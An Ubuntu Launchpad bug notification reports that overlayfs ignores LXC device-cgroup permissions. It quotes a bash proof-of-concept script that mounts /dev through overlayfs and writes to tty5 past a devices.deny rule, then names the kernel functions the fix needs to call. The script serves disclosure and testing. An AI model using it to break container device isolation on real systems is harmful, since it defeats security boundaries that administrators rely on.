Public bug reported:
Using overlayfs with lxc causes tty problems that can kill X. Overlayfs
needs to honor the necessary cgroup permission calls, per the following
information from Serge.
"""
here is a script which you can use to test the overlayfs
issue:
========================= exploit-overlayfs-devices.sh =======================
#!/bin/bash
ddir=`cat /proc/self/mountinfo | grep cgroup | grep devices | awk '{ print $5
}'`
if [ "x$ddir" = "x" ]; then
echo "couldn't find devices cgroup mountpoint"
exit 1
fi
# create new cgroup
ndir=`mktemp -d --tmpdir=$ddir exploit-XXXX`
# create a directory onto which we mount the overlay
odir=`mktemp -d --tmpdir=/mnt exploit-XXXX`
# create the directory to be the overlay dir (where changes
# will be written)
udir=`mktemp -d --tmpdir=/tmp exploit-XXX`
mount -t overlayfs -oupperdir=$udir,lowerdir=/dev none $odir
echo $$ > $ndir/tasks
# deny all device actions
echo a > $ndir/devices.deny
# but allow mknod of tty7, bc we have to mknod it in the writeable
# overlay
echo "c 4:5 m" > $ndir/devices.allow
echo "devices.list: XXXXXXXXXXXXXXX"
cat $ndir/devices.list
echo "XXXXXXXXXXXX"
# try writing to /dev/tty5 - not allowed
echo x > /dev/tty5
echo "write to /dev/tty5 returned $?"
# try writing to tty5 on the overlayfs - SHOULD not be allowed
echo y > $odir/tty5
echo "write to $odir/tty5 returned $?"
umount $odir
rmdir $odir
rm -rf $udir
# move ourselves back to root cgroup (else we can't delete the temp one
# bc it's occupied - by us)
echo $$ > $ddir/tasks
rmdir $ndir
========================= exploit-overlayfs-devices.sh =======================
The write to /dev/tty5 will fail, but the write to $odir/tty5 will
succeed.
fs/overlayfs/inode.c calls generic_permission, but it needs to do more
of what fs/namei.c:inode_permission() does, in particular the calls to
devcgroup_inode_permission() and security_inode_permission().
"""
[This blocks resolution of bug 914169]
** Affects: launchpad
Importance: High
Status: Triaged
** Affects: lxc (Ubuntu)
Importance: Undecided
Status: New
** Tags: paralleltest
** Also affects: launchpad
Importance: Undecided
Status: New
** Changed in: launchpad
Status: New => Triaged
** Changed in: launchpad
Importance: Undecided => High
--
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/915941
Title:
overlayfs does not honor lxc-related permissions
To manage notifications about this bug go to:
https://bugs.launchpad.net/launchpad/+bug/915941/+subscriptions
--
Ubuntu-server-bugs mailing list
Ubuntu-server-bugs@lists.ubuntu.com
Modify settings or unsubscribe at:
https://lists.ubuntu.com/mailman/listinfo/ubuntu-server-bugs
